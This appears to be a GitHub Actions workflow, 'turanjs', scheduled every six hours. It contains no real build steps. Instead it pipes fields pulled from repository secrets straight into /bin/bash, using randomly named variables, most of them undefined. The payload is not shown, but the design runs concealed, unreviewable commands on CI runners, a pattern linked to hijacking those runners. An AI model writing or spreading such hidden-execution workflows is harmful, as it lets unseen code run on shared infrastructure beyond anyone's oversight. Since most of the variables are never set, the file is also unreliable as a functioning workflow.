name: turanjs

on:
  workflow_dispatch:
  schedule:
    - cron: '28 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: turanjs
        env:
          vq2605: ${{ secrets.vq2605 }}
        run: |
          echo $vq2605 | jq -r .oo0977 | /bin/bash
          echo $svko2 | jq -r .ack1834 | /bin/bash
          echo $bjm70 | jq -r .o609 | /bin/bash
          echo $nnibp0463 | jq -r .kj16 | /bin/bash
          echo $pbrv81360 | jq -r .cpjs88811 | /bin/bash
          echo $qd8522 | jq -r .sfa465 | /bin/bash
          echo $cdfw1 | jq -r .cpajy4 | /bin/bash
          echo $tfq4 | jq -r .tmxcs7003 | /bin/bash
          echo $euhfx7271 | jq -r .utckw63 | /bin/bash
          echo $usd8966 | jq -r .zqfd05274 | /bin/bash
          echo $vnz630 | jq -r .nnkey3861 | /bin/bash
          echo $cy0 | jq -r .aba0 | /bin/bash
          echo $f02708 | jq -r .zdmbq69535 | /bin/bash
          echo $ejxj1862 | jq -r .wu5868 | /bin/bash
          echo $n716 | jq -r .drz4458 | /bin/bash
          echo $z4403 | jq -r .splt3699 | /bin/bash

